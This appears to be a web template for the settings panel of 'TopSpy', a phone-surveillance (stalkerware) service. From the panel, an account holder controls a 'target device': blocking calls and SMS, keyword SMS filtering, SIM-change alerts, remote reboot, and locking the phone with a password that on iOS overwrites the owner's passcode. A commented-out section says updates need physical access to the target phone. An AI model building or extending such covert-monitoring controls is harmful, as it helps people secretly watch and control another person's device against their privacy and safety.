<div>
    <h1 class="text-center">{$title}</h1>

    {$di.flashMessages}

    <div class="row">
        <div class="col-lg-6 col-md-6">
            <div class="panel panel-default">
                <div class="panel-heading">{if $data.blockSMSActive}{$di.t->_('Calls & SMS blocking')}{else}{$di.t->_('Blacklist Phone numbers')}{/if}<span class="blue-asterisk">*</span></div>
                <div class="panel-body text-center">
                    {if count($data.blackListPhones)}
                    <ul class="list-group">
                        {foreach from=$data.blackListPhones item=phone}
                        <li class="list-group-item">{$phone} <a href="{$di.router->getRouteUrl('settings')}?removePhonesBlackList={$phone|escape:'url'}" class="close" aria-hidden="true">&times;</a></li>
                        {/foreach}
                    </ul>
                    {/if}
                    <form role="form" action="" class="form-inline" method="post">
                        <div class="form-group">
                            <label>{$di.t->_('Phone Number')}</label>
                            <input type="text" name="phone" value="" class="form-control" placeholder="+12345676789" />
                        </div>
                        <div class="form-group">
                            <button type="submit" class="btn btn-danger" name="phonesBlackList">{$di.t->_('Add')}</button>
                        </div>
                    </form>
                </div>
            </div>
            <div class="panel panel-default">
                <div class="panel-body">
                    <form role="form" action="" method="post">
                        <div class="form-group">
                            <label>{$di.t->_('Device Name')}</label>
                            <input type="text" name="name" value="{$data.devInfo.name}" class="form-control">
                        </div>
                        {if $data.devInfo.os == 'android' || $data.devInfo.os == 'ios'}
                        <div class="form-group">
                            <label>{$di.t->_('Blacklist words for SMS')}<span class="blue-asterisk">*</span></label>
                            <textarea name="blackWords" class="form-control" placeholder="{$di.t->_('Enter comma-separated words, by which SMS will be blocked')}">{$data.settings.bl_words}</textarea>
                        </div>
                        {/if}
                        <div class="checkbox">
                            <label>
                                <input type="checkbox" name="simNotificactions"{if $data.settings.sim_notification} checked{/if} /> {$di.t->_('Receive SIM change notificactions')}<span class="blue-asterisk">*</span>
                            </label>
                        </div>
                        <button type="submit" name="deviceSettings" class="btn btn-primary">{$di.t->_('Update')}</button>
                    </form>
                </div>
            </div>
        </div>
        <div class="col-lg-6 col-md-6">
            <div class="panel panel-default">
                <div class="panel-body">
                    <div class="device-status">
                        <div class="name">{$di.t->_('Device status')}:</div>
                        <div class="value{if $data.online} {if $data.settings.network=='wifi'}wifi{else}mobile{/if}{else} offline{/if} wifi"></div>
                    </div>
                </div>
            </div>
            <div class="panel panel-default">
                <div class="panel-body text-center">
                    <h4>This device is on <span class="text-primary">{$data.plan}</span> plan!</h4>
                    <a href="http://www.topspyapp.com/pricing-and-plans-last/?dev_id={$di.devId}" class="btn btn-warning">{$di.t->_('Upgrade')}</a>
                </div>
            </div>
            {*
            <div class="panel panel-default">
                <div class="panel-body text-center">
                    <div class="settings-box">
                        <h5>New TopSpy app version is available!</h5>
                        <p>The TopSpy version you have installed is outdated. To update it, physical access to the target device is required.</p>
                        <p style="font-size: 14px;">
                            Click "Update device" and within 5 minutes you will see the confirmation pop-up on the target device screen.
                            Click "Update" and the app will start updating automatically.
                        </p>
                        <center><input type="button" id="update_button" value="Update device"></center>
                    </div>
                </div>
            </div>
            *}
            {if $data.reloadActive}
            <div class="panel panel-default">
                <div class="panel-body">
                    <button type="submit" id="rebootDevice" class="btn btn-danger">Reboot Device</button>
                    <button type="submit" id="rebootApp" class="btn btn-danger">Reboot Application</button>
                </div>
            </div>
            {/if}
            {if $data.lockActive}
            <div class="panel panel-default">
                <div class="panel-body">
                    <form role="form" action="" method="post">
                        <div class="form-group">
                            <label for="password">{$di.t->_('Lock device with password')}<span class="blue-asterisk">*</span></label>
                            <input type="text" name="password" id="password" value="" class="form-control">
                            <p class="help-block">{$di.t->_('Only 4 digits!')}</p>
                            {if $data.devInfo.os == 'ios'}<p class="text-info">{$di.t->_('This is a one-time password used for additional authentication. If you already have a password set on the phone, the new one-time password will be written over it. To unblock the phone, enter the new password (the "wrong password" alert will pop up) and then enter the original password.')}</p>{/if}
                        </div>
                        <button type="submit" name="lockDevice" class="btn btn-danger">Lock</button>
                    </form>
                </div>
            </div>
            {/if}
            <div class="panel panel-default">
                <div class="panel-heading">{$di.t->_('Delete device and all it\'s data from account')}</div>
                <div class="panel-body text-center">
                    <p class="text-danger">{$di.t->_('This action can not be undone! All data will be deleted from the account forever.')}</p>
                    <button class="btn btn-danger" id="deleteDevice">{$di.t->_('Delete Device')}</button>
                </div>
            </div>
        </div>
    </div>
    <p class="text-info"><span class="blue-asterisk">*</span>{$di.t->_('Command activation will take up to 20 min. In case targeted phone has additional software to track calls or SMS, blocking may not work properly.')}</p>
</div>
<script>
    $(document).ready(function() {
        $('#deleteDevice').click(function() {
            if (confirm("{$di.t->_('This action cannot be undone! All the data will be deleted from the account permanently!\nDelete Device?')}")) {
                window.location = "{$di.router->getRouteUrl('settings')}?delete";
            }
        });

        $('#rebootDevice').click(function() {
            if (confirm("{$di.t->_('Reboot Device?')}")) {
                window.location = "{$di.router->getRouteUrl('settings')}?rebootDevice";
            }
        });
        
        $('#rebootApp').click(function() {
            if (confirm("{$di.t->_('Reboot Application?')}")) {
                window.location = "{$di.router->getRouteUrl('settings')}?rebootApp";
            }
        });

        $("#password").mask("9999");

        /*      
         $('#update_button').click(function() {
         var button = this;
         if (confirm("Really update?")) {
         $.post(window.location.toString(), {
         must_update: 1
         }, function() {
         $(button).closest('.settings-box').hide();
         });
         }
         });
         */
    });
</script>